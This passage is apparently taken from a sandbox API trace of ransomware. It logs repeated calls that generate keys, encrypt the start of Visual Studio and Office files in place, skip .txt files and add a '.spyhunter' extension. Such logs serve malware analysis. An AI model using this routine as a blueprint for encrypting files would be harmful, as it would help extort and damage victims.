pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\MDIParent.zip.spyhunter") returned 124 [0165.217] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\MDIParent.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\mdiparent.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\MDIParent.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\mdiparent.zip.spyhunter")) returned 1 [0165.217] GetProcessHeap () returned 0x2c0000 [0165.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0165.218] GetProcessHeap () returned 0x2c0000 [0165.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0165.218] GetProcessHeap () returned 0x2c0000 [0165.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e882d0 | out: hHeap=0x2c0000) returned 1 [0165.218] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e790 | out: pbBuffer=0x57e790) returned 1 [0165.218] GetProcessHeap () returned 0x2c0000 [0165.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0165.218] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e788*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e788*=0x30) returned 1 [0165.218] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Class.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\class.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0165.317] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Class.zip") returned 110 [0165.317] StrStrW (lpFirst="Class.zip", lpSrch=".txt") returned 0x0 [0165.317] GetProcessHeap () returned 0x2c0000 [0165.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0165.317] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e74c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e74c*=0x24d, lpOverlapped=0x0) returned 1 [0165.318] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffdb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.318] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x24d, lpNumberOfBytesWritten=0x57e74c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e74c*=0x24d, lpOverlapped=0x0) returned 1 [0165.319] GetProcessHeap () returned 0x2c0000 [0165.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0165.319] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.319] WriteFile (in: hFile=0xa0, lpBuffer=0x57e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e74c, lpOverlapped=0x0 | out: lpBuffer=0x57e78c*, lpNumberOfBytesWritten=0x57e74c*=0x4, lpOverlapped=0x0) returned 1 [0165.319] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e74c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e74c*=0x30, lpOverlapped=0x0) returned 1 [0165.319] CloseHandle (hObject=0xa0) returned 1 [0165.319] GetProcessHeap () returned 0x2c0000 [0165.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0165.319] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Class.zip.spyhunter") returned 120 [0165.319] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Class.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\class.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Class.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\class.zip.spyhunter")) returned 1 [0165.489] GetProcessHeap () returned 0x2c0000 [0165.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0165.489] GetProcessHeap () returned 0x2c0000 [0165.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0165.489] GetProcessHeap () returned 0x2c0000 [0165.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eac3d0 | out: hHeap=0x2c0000) returned 1 [0165.489] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e790 | out: pbBuffer=0x57e790) returned 1 [0165.489] GetProcessHeap () returned 0x2c0000 [0165.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0165.489] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e788*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e788*=0x30) returned 1 [0165.489] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\TextFile.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\textfile.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0165.586] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\TextFile.zip") returned 108 [0165.586] StrStrW (lpFirst="TextFile.zip", lpSrch=".txt") returned 0x0 [0165.586] GetProcessHeap () returned 0x2c0000 [0165.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0165.586] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e74c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e74c*=0x226, lpOverlapped=0x0) returned 1 [0165.587] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffdda, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.587] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x226, lpNumberOfBytesWritten=0x57e74c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e74c*=0x226, lpOverlapped=0x0) returned 1 [0165.587] GetProcessHeap () returned 0x2c0000 [0165.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0165.587] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.588] WriteFile (in: hFile=0xb0, lpBuffer=0x57e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e74c, lpOverlapped=0x0 | out: lpBuffer=0x57e78c*, lpNumberOfBytesWritten=0x57e74c*=0x4, lpOverlapped=0x0) returned 1 [0165.588] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e74c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e74c*=0x30, lpOverlapped=0x0) returned 1 [0165.588] CloseHandle (hObject=0xb0) returned 1 [0165.588] GetProcessHeap () returned 0x2c0000 [0165.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.588] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\TextFile.zip.spyhunter") returned 118 [0165.588] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\TextFile.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\textfile.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\TextFile.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\textfile.zip.spyhunter")) returned 1 [0165.669] GetProcessHeap () returned 0x2c0000 [0165.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.669] GetProcessHeap () returned 0x2c0000 [0165.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0165.670] GetProcessHeap () returned 0x2c0000 [0165.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eabe08 | out: hHeap=0x2c0000) returned 1 [0165.670] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e788 | out: pbBuffer=0x57e788) returned 1 [0165.670] GetProcessHeap () returned 0x2c0000 [0165.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0165.670] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e780*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e780*=0x30) returned 1 [0165.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settings.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0165.671] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip") returned 108 [0165.671] StrStrW (lpFirst="Settings.zip", lpSrch=".txt") returned 0x0 [0165.671] GetProcessHeap () returned 0x2c0000 [0165.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0165.671] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e744, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e744*=0x3b8, lpOverlapped=0x0) returned 1 [0165.697] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffc48, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.697] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x3b8, lpNumberOfBytesWritten=0x57e744, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e744*=0x3b8, lpOverlapped=0x0) returned 1 [0165.697] GetProcessHeap () returned 0x2c0000 [0165.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0165.697] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.697] WriteFile (in: hFile=0xb0, lpBuffer=0x57e784*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e744, lpOverlapped=0x0 | out: lpBuffer=0x57e784*, lpNumberOfBytesWritten=0x57e744*=0x4, lpOverlapped=0x0) returned 1 [0165.697] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e744, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e744*=0x30, lpOverlapped=0x0) returned 1 [0165.697] CloseHandle (hObject=0xb0) returned 1 [0165.697] GetProcessHeap () returned 0x2c0000 [0165.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.698] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip.spyhunter") returned 118 [0165.698] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settings.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settings.zip.spyhunter")) returned 1 [0165.698] GetProcessHeap () returned 0x2c0000 [0165.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.704] GetProcessHeap () returned 0x2c0000 [0165.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0165.704] GetProcessHeap () returned 0x2c0000 [0165.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eabce0 | out: hHeap=0x2c0000) returned 1 [0165.704] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e788 | out: pbBuffer=0x57e788) returned 1 [0165.704] GetProcessHeap () returned 0x2c0000 [0165.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0165.704] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e780*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e780*=0x30) returned 1 [0165.704] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\mdiparent.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0165.705] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip") returned 109 [0165.705] StrStrW (lpFirst="MDIParent.zip", lpSrch=".txt") returned 0x0 [0165.705] GetProcessHeap () returned 0x2c0000 [0165.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0165.705] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e744, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e744*=0x2800, lpOverlapped=0x0) returned 1 [0165.817] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.817] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e744, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e744*=0x2800, lpOverlapped=0x0) returned 1 [0165.817] GetProcessHeap () returned 0x2c0000 [0165.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0165.817] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.817] WriteFile (in: hFile=0xb0, lpBuffer=0x57e784*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e744, lpOverlapped=0x0 | out: lpBuffer=0x57e784*, lpNumberOfBytesWritten=0x57e744*=0x4, lpOverlapped=0x0) returned 1 [0165.850] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e744, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e744*=0x30, lpOverlapped=0x0) returned 1 [0165.850] CloseHandle (hObject=0xb0) returned 1 [0165.851] GetProcessHeap () returned 0x2c0000 [0165.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.851] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip.spyhunter") returned 119 [0165.851] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\mdiparent.zip"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\mdiparent.zip.spyhunter")) returned 1 [0165.852] GetProcessHeap () returned 0x2c0000 [0165.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.852] GetProcessHeap () returned 0x2c0000 [0165.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0165.852] GetProcessHeap () returned 0x2c0000 [0165.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee7aa0 | out: hHeap=0x2c0000) returned 1 [0165.852] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e780 | out: pbBuffer=0x57e780) returned 1 [0165.852] GetProcessHeap () returned 0x2c0000 [0165.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0165.852] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e778*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e778*=0x30) returned 1 [0165.852] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.AddInManager.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.addinmanager.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0165.853] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.AddInManager.dll") returned 140 [0165.853] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Applications.AddInManager.dll", lpSrch=".txt") returned 0x0 [0165.853] GetProcessHeap () returned 0x2c0000 [0165.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0165.853] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e73c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e73c*=0x2800, lpOverlapped=0x0) returned 1 [0165.854] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.854] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e73c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e73c*=0x2800, lpOverlapped=0x0) returned 1 [0165.854] GetProcessHeap () returned 0x2c0000 [0165.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0165.854] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.854] WriteFile (in: hFile=0xb0, lpBuffer=0x57e77c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e73c, lpOverlapped=0x0 | out: lpBuffer=0x57e77c*, lpNumberOfBytesWritten=0x57e73c*=0x4, lpOverlapped=0x0) returned 1 [0165.881] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e73c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e73c*=0x30, lpOverlapped=0x0) returned 1 [0165.881] CloseHandle (hObject=0xb0) returned 1 [0165.882] GetProcessHeap () returned 0x2c0000 [0165.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0165.882] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.AddInManager.dll.spyhunter") returned 150 [0165.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.AddInManager.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.addinmanager.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\Microsoft.VisualStudio.Tools.Applications.AddInManager.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\microsoft.visualstudio.tools.applications.addinmanager.dll.spyhunter")) returned 1 [0165.883] GetProcessHeap () returned 0x2c0000 [0165.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0165.883] GetProcessHeap () returned 0x2c0000 [0165.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0165.883] GetProcessHeap () returned 0x2c0000 [0165.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e936c8 | out: hHeap=0x2c0000) returned 1 [0165.883] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e780 | out: pbBuffer=0x57e780) returned 1 [0165.883] GetProcessHeap () returned 0x2c0000 [0165.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0165.883] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e778*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e778*=0x30) returned 1 [0165.883] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\URLREDIR.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\urlredir.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0165.886] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\URLREDIR.DLL") returned 65 [0165.888] StrStrW (lpFirst="URLREDIR.DLL", lpSrch=".txt") returned 0x0 [0165.891] GetProcessHeap () returned 0x2c0000 [0165.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0165.891] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e73c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e73c*=0x2800, lpOverlapped=0x0) returned 1 [0165.893] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.893] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e73c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e73c*=0x2800, lpOverlapped=0x0) returned 1 [0165.893] GetProcessHeap () returned 0x2c0000 [0165.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0165.893] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.893] WriteFile (in: hFile=0xb0, lpBuffer=0x57e77c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e73c, lpOverlapped=0x0 | out: lpBuffer=0x57e77c*, lpNumberOfBytesWritten=0x57e73c*=0x4, lpOverlapped=0x0) returned 1 [0165.908] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, 